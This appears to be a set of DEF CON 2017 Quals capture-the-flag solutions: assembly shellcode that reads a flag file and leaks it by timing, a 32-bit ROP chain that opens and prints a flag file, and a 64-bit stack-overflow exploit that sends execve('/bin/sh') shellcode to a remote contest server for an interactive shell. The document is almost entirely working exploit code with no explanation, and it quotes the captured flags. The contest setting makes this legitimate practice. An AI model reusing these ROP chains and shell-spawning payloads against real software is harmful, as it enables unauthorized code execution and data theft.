DEFCON 2017 Quals

mute.S

BITS 64
	
_start:


	mov		rdi, rax
	mov		rax, 0x3
	syscall
	pop		rcx
	mov		rcx, 0x67616c66
	push	rcx
	mov		rdi, rsp
	xor		rsi, rsi
	xor		rdx, rdx
	mov		rax, 0x2
	syscall

readflag:	
	mov		rdi, rax
	mov		rsi, rbp
	sub		rsi, 0x80
	mov		rdx, 0x80
	xor		rax, rax
	syscall


checkflag:
	mov		al, [rsi+0x32]
	cmp		al, 0x64
	jge		checkflag
	

peROPdo.py

#! python3


import sys

bss1 = 0x80ecfc4
bss = 0x80ecfc4+140
ptr = 0x80ed02c


buf = 0x802d02c

int80 = 0x0806fae0
pop_eax = 0x080e558a
push_eax = 0x080e789c
pop_ebx = 0x080481c9
pop_ecx = 0x080e5ee1
push_ecx = 0x080e403a
pop_edx = 0x0806f2fa
push_edx =  0x08064828
push_esp = 0x080e192d
xchg_eax_edx = 0x080e8e02
xor_eax_eax = 0x080555c0
inc_eax = 0x080e30a3
inc_ebx = 0x080e9b21
inc_ecx = 0x080e794e
inc_edx = 0x0805da67

#binsh = b'/bin/sh'
flag = b'flag'

gablen = 100


def exploit():


    # open('flag', 0, 0);
    payload  = b''
    payload += pI(pop_ebx)
    payload += pI(0x080ed0d6)
    payload += pI(pop_ecx)
    payload += pI(0xffffffff)
    payload += pI(inc_ecx)
    payload += pI(xor_eax_eax)
    payload += pI(xor_eax_eax)
    payload += pI(xchg_eax_edx)
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x5)
    payload += pI(int80)
    #payload += pI(bss)


    # read(3, bss1, 0x0e0e0e0e);
    payload += pI(pop_ebx)
    payload += pI(0xffffffff)
    payload += pI(inc_ebx)*4
    payload += pI(pop_ecx)
    payload += pI(bss1)
    payload += pI(pop_edx)
    payload += pI(0x0e0e0e0e)
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x3)
    payload += pI(int80)
    

    # write(1, bss1, 0x0e0e0e0e);
    payload += pI(pop_ebx)
    payload += pI(0xffffffff)
    payload += pI(inc_ebx)*2
    payload += pI(pop_ecx)
    payload += pI(bss1)
    payload += pI(xor_eax_eax)
    payload += pI(inc_eax)*(0x4)
    payload += pI(int80)

    
    payload1  = b''
    payload1 += pI(0x31457185)
    
    payload1 += b'b'*100
    payload1 += payload
    
    payload1 += b'./'*50
    payload1 += flag
    payload1 += b'\n'

    payload1 += b'15\n'
    payload1 += b'y\n'
    payload1 += b'20\n'
    payload1 += b'y\n'
    payload1 += b'20\n'
    payload1 += b'y\n'
    payload1 += b'23\n'
    payload1 += b'n\n'

    sys.stdout.buffer.write(payload1)
    

def main():
    exploit()

    
if __name__ == '__main__':
    main()


"""
The flag is: Thanks to Kenshoto for the inspiration! 5fbb34920c457b2e0855a174b8de3ebc

"""

smashme.py

#! python3
from ctflib import Pwn
from ctflib.util import *
import sys
import time

def exploit(cn):
    paylen = 33
    
    pop_rdi_ret = 0x4014d6
    pop_rsi_ret = 0x4015f7
    pop_rdx_ret = 0x441e46
    
    main_gets = 0x4009dd
    bss = 0x6ca000
    syscall_ret = 0x466815
    
    sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
    
    payload  = b''
    payload += b'Smash me outside, how bout dAAAAAAAAAAA'
    
    payload += b'b'*(33)
    
    payload += pQ(pop_rsi_ret)
    payload += pQ(bss)
    payload += pQ(pop_rdi_ret)
    payload += pQ(0)
    payload += pQ(pop_rdx_ret)
    payload += pQ(0x30)
    payload += pQ(syscall_ret)
    payload += pQ(bss)
    
    payload += b'\n'

    #input('aaa')

    cn.send(payload)

    time.sleep(1)

    cn.send(sc)

    cn.interact()
    
def main():
    cn = Pwn()
    #cn.connect('localhost',  57348)
    cn.connect('smashme_omgbabysfirst.quals.shallweplayaga.me',  57348)
    exploit(cn)


if __name__ == '__main__':
    main()



"""
The flag is: You must be at least this tall to play DEF CON CTF

"""